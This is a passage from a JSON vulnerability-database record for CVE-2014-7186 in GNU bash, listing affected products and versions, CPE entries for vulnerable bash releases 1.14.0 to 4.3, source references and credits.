"version": "6.0.461.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.1" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.446.0" }, { "model": "secureplatform r75.47", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "move firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.88" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.5" }, { "model": "nsmxpress appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.357.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.459.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.541.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.221" }, { "model": "espace u2980 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.18" }, { "model": "nexus switch for nexus series 4.1 e1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v4000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.333.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.779.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.57" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.42" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "6655" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.9" }, { "model": "bsc6000 v900r008c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.307" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1027" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.396.0" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.157" }, { "model": "bsc6000 v901r013c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.428.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1035.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.0" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9301" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.460.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.87" }, { "model": "siem enterprise security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.2" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "galax8800 v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "secureplatform r71.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1053" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.74" }, { "model": "viewplanner", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.8" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5945" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.455.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1014.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.449.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.142" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.620.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.497.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.82" }, { "model": "oceanstor s5900 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.576.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1015.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.795.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "secureplatform r76", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.213" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.12" }, { "model": "gaia embedded r70.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.148" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.751.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.636.0" }, { "model": "secure access link gas", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "oceanstor s5300 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.313" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "65.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.12" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.64" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.5" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.456.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.831.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.65" }, { "model": "saas email protection", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.0" }, { "model": "oceanstor s6800t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "high-density server dh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.38" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "secureplatform r76", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.111" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.550.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.583.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.595.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1009" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.94" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.866.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.101" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7545061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.15" }, { "model": "secureplatform r71.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.128" }, { "model": "configuration and orchestration manager vps", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.62" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.653.0" }, { "model": "aura application server sip core pb16", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1656.1" }, { "model": "associates layer api management portal", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.35" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.713.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.643.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.22" }, { "model": "fusioncompute v100r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.228" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.504.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.12" }, { "model": "ipso r71.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "unstructured data identification and mgmt", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.129" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.21" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.41" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.14150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.218" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.05" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.4" }, { "model": "gaia r71.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.68" }, { "model": "espace dcm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.359.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.26" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.83" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.565.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.3" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.567.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37586" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.33" }, { "model": "oceanstor cse v100r002c00lsfm01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.238" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.656.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.55" }, { "model": "ip flow manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.53" }, { "model": "b189 ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.022" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1011" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1033.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.788.0" }, { "model": "gaia embedded r70.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.691.0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "BID", "id": "70152" }, { "db": "CNNVD", "id": "CNNVD-201409-1072" }, { "db": "NVD", "id": "CVE-2014-7186" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-7186" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "128716" }, { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "129067" }, { "db": "PACKETSTORM", "id": "129070" }, { "db": "PACKETSTORM", "id": "129438" }, { "db": "PACKETSTORM", "id": "128762" }, { "db": "PACKETSTORM", "id": "129073" }, { "db": "PACKETSTORM", "id": "128760" } ], "trust": 0.9 }, "cve": "CVE-2014-7186", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": 